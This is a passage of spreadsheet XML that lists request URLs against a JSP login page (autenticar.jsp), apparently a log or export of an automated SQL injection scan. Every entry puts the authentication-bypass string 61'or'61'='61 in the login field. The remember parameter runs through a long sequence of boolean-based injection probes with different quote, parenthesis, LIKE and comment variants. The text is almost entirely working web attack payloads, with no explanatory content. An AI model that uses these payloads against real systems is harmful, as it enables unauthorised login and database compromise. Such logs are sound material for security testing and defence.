    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=1378&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=()"))'"'')&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and5661=8717&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and6525=6525&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and1409=8587&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and4134=2552&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and6525=6525&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and4703=5991&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and1283=3748&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and6525=6525&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and2919=74&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and615=2873&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and6525=6525&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and8089=3704&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and1119=4063and(4014=4014&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and6525=6525and(8981=8981&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and40=972and(6772=6772&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and8071=3099and((3484=3484&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and6525=6525and((9827=9827&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and5721=5470and((7292=7292&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and8206=9202and(((4523=4523&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and6525=6525and(((7685=7685&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and1379=8852and(((3573=3573&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and1642=9517&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and6525=6525&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and9481=5609&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and6213=97and('wnzj'='wnzj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and6525=6525and('hdue'='hdue&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and7159=4871and('bvsl'='bvsl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and8201=8992and(('kxgu'='kxgu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and6525=6525and(('gauh'='gauh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and745=8971and(('egsn'='egsn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and166=3963and((('wqap'='wqap&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and6525=6525and((('amlr'='amlr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and2853=4694and((('kmlb'='kmlb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and5127=320and'yuih'='yuih&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and6525=6525and'fpbs'='fpbs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and6752=9856and'wofo'='wofo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and4245=4510and('tpyo'like'tpyo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and6525=6525and('eteq'like'eteq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and8471=6993and('mwnd'like'mwnd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and362=5106and(('cibk'like'cibk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and6525=6525and(('itym'like'itym&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and8314=5131and(('dfhf'like'dfhf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and2173=958and((('jarg'like'jarg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and6525=6525and((('sqnw'like'sqnw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and2071=3827and((('ccjm'like'ccjm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and3402=2412and'ycfo'like'ycfo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and6525=6525and'dtjo'like'dtjo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8091=4396and'bzsu'like'bzsu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and5304=6948and("ppne"="ppne&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and6525=6525and("qcip"="qcip&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and875=3626and("gxwq"="gxwq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and6807=7417and(("einz"="einz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and6525=6525and(("fmbt"="fmbt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and2928=8264and(("vrjm"="vrjm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and4038=9638and((("zhxv"="zhxv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and6525=6525and((("cjnj"="cjnj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and9587=4038and((("xjam"="xjam&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and6756=6534and"vlqt"="vlqt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and6525=6525and"gyeo"="gyeo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and5284=1346and"axgl"="axgl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and7205=1996and("pzgc"like"pzgc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and6525=6525and("uapl"like"uapl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and9840=8306and("yuue"like"yuue&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and2078=4824and(("fdot"like"fdot&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and6525=6525and(("wmyr"like"wmyr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and2108=4707and(("wkwn"like"wkwn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and9724=4766and((("cgme"like"cgme&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and6525=6525and((("rqqk"like"rqqk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and6932=2153and((("plnk"like"plnk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and141=6499and"rglv"like"rglv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and6525=6525and"jotl"like"jotl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and7374=576and"udpa"like"udpa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and8917=2616--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and5727=5727--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and5169=8615--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and4679=6854--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and5727=5727--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and5341=4402--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and173=6498--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and5727=5727--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and4640=8967--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and5162=9975--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and5727=5727--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and3764=8403--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and1567=4--and(5223=5223&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and5727=5727--and(7514=7514&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)and5446=451--and(6263=6263&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and7457=973--and((6340=6340&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and5727=5727--and((5887=5887&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))and6563=5060--and((7430=7430&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and7941=5471--and(((1598=1598&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and5727=5727--and(((6898=6898&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))and697=4106--and(((1518=1518&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and278=4483--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and5727=5727--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=and1487=5692--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and3802=866--and('dcsi'='dcsi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and5727=5727--and('jeod'='jeod&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and7486=3465--and('hmdl'='hmdl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and2459=4438--and(('skbe'='skbe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and5727=5727--and(('qcqb'='qcqb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and1056=8068--and(('ewlh'='ewlh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and2356=5486--and((('plhz'='plhz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and5727=5727--and((('vrqs'='vrqs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and2484=1422--and((('zmlw'='zmlw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and6493=6772--and'xryu'='xryu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and5727=5727--and'trog'='trog&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and8635=7189--and'nktr'='nktr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and4163=2644--and('wxab'like'wxab&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and5727=5727--and('sdlm'like'sdlm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')and8061=3203--and('wfji'like'wfji&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and3834=2985--and(('erap'like'erap&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and5727=5727--and(('dvit'like'dvit&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))and5162=316--and(('gfmu'like'gfmu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and6972=3310--and((('ivzg'like'ivzg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and5727=5727--and((('zoij'like'zoij&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))and6669=8321--and((('rjbu'like'rjbu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and3201=6989--and'zdrv'like'zdrv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and5727=5727--and'lohc'like'lohc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='and769=2209--and'miql'like'miql&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and703=6525--and("mcgb"="mcgb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and5727=5727--and("wbhl"="wbhl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and1425=5689--and("qogu"="qogu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and2013=7955--and(("vfal"="vfal&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and5727=5727--and(("mgqe"="mgqe&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and8527=5160--and(("bosa"="bosa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and7189=1341--and((("dlvx"="dlvx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and5727=5727--and((("aygx"="aygx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and6412=5283--and((("sybh"="sybh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and2647=52--and"lzgz"="lzgz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and5727=5727--and"gdnv"="gdnv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and7717=5517--and"dnsz"="dnsz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and5345=9107--and("dzpy"like"dzpy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and5727=5727--and("njqt"like"njqt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")and7998=4736--and("nrvk"like"nrvk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and2230=5729--and(("opuk"like"opuk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and5727=5727--and(("atzk"like"atzk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))and1102=3418--and(("jkwq"like"jkwq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and919=797--and((("eojk"like"eojk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and5727=5727--and((("hhod"like"hhod&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))and8625=7356--and((("fclz"like"fclz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and2577=6848--and"dpah"like"dpah&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and5727=5727--and"hrre"like"hrre&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="and9837=4617--and"oviv"like"oviv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7256&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5027)ornot(4410=4927)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5707)ornot(3089=3089)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8513)ornot(9555=5991)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4934&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7924')ornot(5706=6508)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5694')ornot(3089=3089)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-5743')ornot(9649=3903)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8980&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-8503'ornot(1673=3562)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-4812'ornot(3089=3089)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-830'ornot(3453=8632)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-6446&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-3542"ornot(5377=9977)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-1318"ornot(3089=3089)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-2198"ornot(2734=1000)&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-7238&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=-706)ornot(9700=5587)and(5447=5447&amp;modo=entrar</t>
  </si>
  <si>
